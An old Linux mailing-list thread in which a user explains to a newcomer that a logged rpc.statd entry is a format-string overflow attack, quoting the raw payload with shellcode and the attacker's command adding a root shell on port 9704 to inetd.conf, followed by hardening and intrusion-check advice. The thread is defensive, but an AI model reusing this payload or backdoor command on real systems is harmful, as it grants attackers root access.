On Thu, 24 May 2001 [EMAIL PROTECTED] wrote: What you have there is someone trying to do a buffer overflow attack on rpc.statd. The idea is that once the buffer is blown, they will get a chance to issue a command as root. In the attack that was attempted on on of the systems I was given to supervise the last part of the garbage sent to the buffer was: /bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
This, if it had succeeded, would have created a new line in inetd.conf and restarted inetd. Then they would have come in on port 9704 to a nice root shell and did what ever they wanted to do.... probably remove that line, edit my logs, install a root kit, and leave as quietly as possible. Luckily this time it didn't work and left some dirty footprints as evidence. As stated earlier the best way to deal with this, if you don't need rpc services running for NFS/NIS or something similar is to just shut portmapper and all the other RPC services down and remove them from your start up scripts. I was curios however, so I just made sure tcp wrapper -tcpd - covered portmapper and added portmap: ALL to my /etc/hosts.deny file so I could gather some IP numbers via TCPD logging. Figure I should let the networks assigned the IPs know that some of their machines are compromised/being used for cracking. While setting up a firewall as others have previously suggested is a dang good idea, don't forget to use tcp wrappers also, if for only the logging. For the security conscious, or the inexperienced a good first step right after first booting a machine is to type su -c "echo ALL:ALL > /etc/hosts.deny" root . I'd do that before even connecting to the network. Later if you must you can relax it a bit, but its a good place to start. Howerver, now that you have seen this one attack, you should probably go over your logs and system accounting files with a fine tooth comb and see if anyone else might have succeeded before or after ;) This is a far from exhaustive list but try: looking for any breaks in your log files or unexpected daemon restarts. examine your crontabs to see if there are any jobs you didn't put there. check your /etc/passwd file for any unrecognized users or strange shells. check inetd.conf for any odd entries. run a find / -m x to look for new or edited files. see if there are any there that you don't remember editing. Look for changed permissions too. download at root kit detector and see if anyone has already left you a present. again this is just the start ;) I apologize to folks who consider this all old-news, but trevs was brave enough to admit he didn't know, so there are probably a few others lurking in the same boat ;) Good luck! David. > Heya :) > > I was running a 'tail -f' on my /var/log/messages and this entry appeared > while > I was connected to the internet: > > May 24 10:08:11 noogies -- MARK -- > May 24 10:20:34 noogies > May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for > ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 > May 24 10:20:34 noogies > Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ > > and it has me worried it may be a security issue. I'm very new to linux, and > newer again to debian, and at this stage I really don't have a clue as to what > the above log entry is trying to tell me... > > Any input or comments would be very appreciated :) > > Thank you > > - trevs > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > >
